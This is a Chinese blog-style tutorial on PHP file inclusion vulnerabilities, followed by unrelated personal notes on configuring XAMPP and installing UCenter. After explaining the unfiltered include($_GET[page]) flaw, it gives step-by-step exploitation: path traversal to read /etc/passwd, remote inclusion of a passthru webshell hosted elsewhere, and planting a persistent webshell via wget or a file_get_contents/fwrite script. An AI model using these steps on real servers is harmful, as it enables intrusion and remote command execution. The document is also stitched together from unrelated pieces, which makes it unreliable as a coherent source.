如果”allow_url_fopen”在 PHP 中被激活(默认配置),也可以用 URL(通过 HTTP 或者其它支持的封装协议)而不是本地文件来指定要被包括的文件。如果目标服务器将目标文件作为 PHP 代码解释,则可以用适用于 HTTP GET 的 URL 请求字符串来向被包括的文件传递变量。
详细参考:http://www.phpe.net/manual/function.include.php
require_once() && include_once()
require_once()和include_once() 语句在脚本执行期间包括并运行指定文件。此行为和 require() 语句类似,唯一区别是如果该文件中的代码已经被包括了,则不会再次包括。适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包 括一次以避免函数重定义,变量重新赋值等问题。
详细参考:http://www.phpe.net/manual/function.require-once.php
二、为什么要包含文件
程序员写程序的时候,不喜欢干同样的事情,也不喜欢把同样的代码(比如一些公用的函数)写几次,于是就把需要公用的代码写在一个单独的文件里面,比 如 share.php,而后在其它文件进行包含调用。在php里,我们就是使用上面列举的那几个函数来达到这个目的的,它的工作流程:如果你想在 main.php里包含share.php,我将这样写include(”share.php”)就达到目的,然后就可以使用share.php中的函数 了,像这个写死需要包含的文件名称的自然没有什么问题,也不会出现漏洞,那么问题到底是出在哪里呢?
有的时候可能不能确定需要包含哪个文件,比如先来看下面这个文件index.php的代码:
CODE: [Copy to clipboard]
——————————————————————————–
if ($_GET[page]) {
include $_GET[page];
} else {
include “home.php”;
}
很正常的一段PHP代码,它是怎么运作的呢?这里面涉及到$_GET的意义,我就不打算讲了(要不又能写篇HTTP的文章了),如果你还不了解GET,POST,等,那么你需要再Google一些相关的资料好好补一补了。
上面这段代码的使用格式可能是这样的:http://www.php100.com/php/index.php?page=main.php或者 http: //www.php100.com/php/index.php?page=downloads.php,结合上面代码,简单说下怎么运作的:
1.提交上面这个URL,在index.php中就取得这个page的值($_GET[page])。
2.判断$_GET[page]是不是空,若不空(这里是main.php)就用include来包含这个文件。
3.若$_GET[page]空的话就执行else,来include home.php 这个文件。
三、为什么会产生漏洞
你也许要说,这样很好呀,可以按照URL来动态包含文件,多么方便呀,怎么产生漏洞的呢?问题的答案是:我们不乖巧,我们总喜欢和别人不一样,我们 不会按照他的链接来操作,我们可能想自己写想包含(调用)的文件,比如我们会随便的打入下面这个URL:http: //www.1steam.cn/php/index.php?page=hello.php。然后我们的index.php程序就傻傻按照上面我们说得 步骤去执行:取page为hello.php,然后去include(hello.php),这时问题出现了,因为我们并没有hello.php这个文 件,所以它 include的时候就会报警告,类似下列信息:
Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
Warning: include() [function.include]: Failed opening ‘hello.php’ for inclusion (include_path=’.:’) in /vhost/wwwroot/php/index.php on line 3
注意上面的那个Warning就是找不到我们指定的hello.php文件,也就是包含不到我们指定路径的文件;而后面的警告是因为前面没有找到指定文件,所以包含的时候就出警告了。
四、怎么利用
上面可以看到,问题出现了,那么我们怎么利用这样的漏洞呢,利用方法其实很多,但是实质上都是差不多的,我这里说三个比较常见的利用方法:
1.包含读出目标机上其它文件
由前面我们可以看到,由于对取得的参数page没有过滤,于是我们可以任意指定目标主机上的其它敏感文件,例如在前面的警告中,我们可以看到暴露的 绝对路径(vhost/wwwroot/php/),那么我们就可以多次探测来包含其它文件,比如指定URL为:http: //www.php100.com/php/index.php?page=./txt.txt可以读出当前路径下的txt.txt文件,也可以使用.. /../进行目录跳转(在没过滤../的情况下);也可以直接指定绝对路径,读取敏感的系统文件,比如这个URL:http: //www.php100.com/php/index.php?page=/etc/passwd,如果目标主机没有对权限限制的很严格,或者启动 Apache的权限比较高,是可以读出这个文件内容的。否则就会得到一个类似于:open_basedir restriction in effect.的Warning。
2.包含可运行的PHP木马
如果目标主机的”allow_url_fopen”是激活的(默认是激活的,没几个人会修改),我们就可以有更大的利用空间,我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行,比如,我先写一段运行命令的PHP代码(加了注释,应该看得懂),如下保存为 cmd.txt(后缀不重要,只要内容为PHP格式就可以了)。
if (get_magic_quotes_gpc())
{$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //去掉转义字符(可去掉字符串中的反斜线字符)
ini_set(”max_execution_time”,0); //设定针对这个文件的执行时间,0为不限制.
echo ”
1.S.T
“;
本文章简单摘要://打印的返回的开始行提示信息passthru($_REQUEST["cmd"]); //运行cmd指定的命令 echo”1.S.T”;//打印的返回的结束行提示信息?>以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内 容返回在1.S.T之间。把这个文件保存到我们主机的服务器上(可以是不支持PHP的主机),只要能通过HTTP访问到就可以了。
//打印的返回的开始行提示信息
passthru($_REQUEST["cmd"]); //运行cmd指定的命令
echo ”
1.S.T
“;//打印的返回的结束行提示信息
?>
以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内容返回在1.S.T之间。把这个文件保存到我们主机的服务器上 (可以是不支持PHP的主机),只要能通过HTTP访问到就可以了,例如地址如下:http://www.php100.com/cmd.txt,然后我 们就可以在那个漏洞主机上构造如下URL来利用了:http://www.php100.com/php/index.php?page=http: //www.php100.net/cmd.txt?cmd=ls,其中cmd后面的就是你需要执行的命令,其它常用的命令(以*UNIX为例)如下:
Quote:
ll 列目录、文件(相当于Windows下dir)
pwd 查看当前绝对路径
id whoami 查看当前用户
wget 下载指定URL的文件
等等其它的,你主机去BAIDU找吧,就不列举了。
上面的方法就是得到一个Webshell了(虽然这个PHP文件不在目标机上,但是它确实是个Webshell,不是么?呵呵)
3.包含一个创建文件的PHP文件
也许有的人认为还是得到目标机上的一个真实的Webshell比较放心,万一哪天人家发现这儿个包含漏洞修补了,我们就不能再远程包含得到上面的那个” 伪”Webshell了,不是么?可以理解这个心态,我们继续。得到一个真实的Webshell,我们也说两种常见的方法:
1)使用wget之类的命令来下载一个Webshell
这个比较简单,也很常用,在上面我们得到的那个伪webshell中,我们可以执行命令,那么我们也可以调用系统中的一个很厉害的角色,wget, 这个命令的强大你可以google下,参数一大堆,绝对搞晕你,呵呵,我们不需要那么复杂,我们就使用一个-O(–output- document=FILE,把文档写到FILE文件中) 就可以了,呵呵。
前提是你在按照前面的步骤放一个包含PHP代码的Webshell在一个可以通过HTTP或者FTP等可以访问的地方,比 如:http://www.php100.com/1stphp.txt,这个文件里写的就是Webshell的内容。然后我们在前面得到的伪 Webshell中执行如下的URL:http://www.php100.com/php/index.php?page=http: //www.php100.com/cmd.txt?cmd=wgethttp://www.php100.net/1stphp.txt-O 1stphp.php,如果当前目录可写,就能得到一个叫做1stphp.php的Webshell了;如果当前目录不可写,还需要想其它的办法。
2)使用文件来创建
前面的wget可能会遇到当前目录不能写的情况;或者目标主机禁用了(或者没装)这个命令,我们又需要变通一下了,我们可以结合前面的包含文件漏洞来包含一个创建文件(写文件)的PHP脚本,内容如下:
$f=file_get_contents(”http://www.php100.com/1stphp.txt“;); //打开指定路径的文件流
$ff=fopen(”./upload/1st.php”,”a”); //寻找一个可以的目录,创建一个文件
fwrite ($ff,$f); //把前面打开的文件流写到创建的文件里
fclose($ff); //关闭保存文件
?>
还是写入我们上面用wget下载的那个php文件,但是我们改进了方法,用PHP脚本来实现,可以使用上面的cmd.php?cmd=ll查找可以 写的目录,比如这里的upload,然后把文件创建在这个目录下:./upload/1st.php。然后就得到我们的Webshell了。
http://hi.baidu.com/cg_kevin/blog/item/933b73cc20ea5821b700c841.html
xampp 访问出现New XAMPP security concept
New XAMPP security concept: 解决办法: 打开httpd-xampp.conf(/xampp/apache/conf/extra/httpd-xampp.conf) 找到以下内容 将Deny from all这一行注释掉,即 |
要解决对于mysql, phpmyadmin以及xampp目录的问题, 您只需简单的执行
=> http://localhost/security/xamppsecurity.php <=
http://192.168.100.182/security/
成功: XAMPP目录已受到保护! 所有的个人数据All personal data was safed in the following file:
C:\soft\xampp\security\xampp.users
C:\soft\xampp\htdocs\xampp\.htaccess
https://xiamiwang.net/uc16/install/index.php
The file data/config.inc.php does not exist, perhaps because of UCenter has not been installed, Please click here to install it..
对不起,请将 php.ini 中的 short_open_tag 设置为 On,否则无法继续安装。
您必须解决以上问题,安装才可以继续
C:\soft\xampp\php>vim php.ini
...
; modify by lindows.iteye.com 20110615
229 short_open_tag = On
...
C:\soft\xampp>xampp_restart.exe
Restarting "xampp"...
"xampp" is restarted.
https://xiamiwang.net/dz20/install/index.php
Ucenter URL https://www.xiamiwang.net/uc16
站点URL http://www.xiamiwang.net
end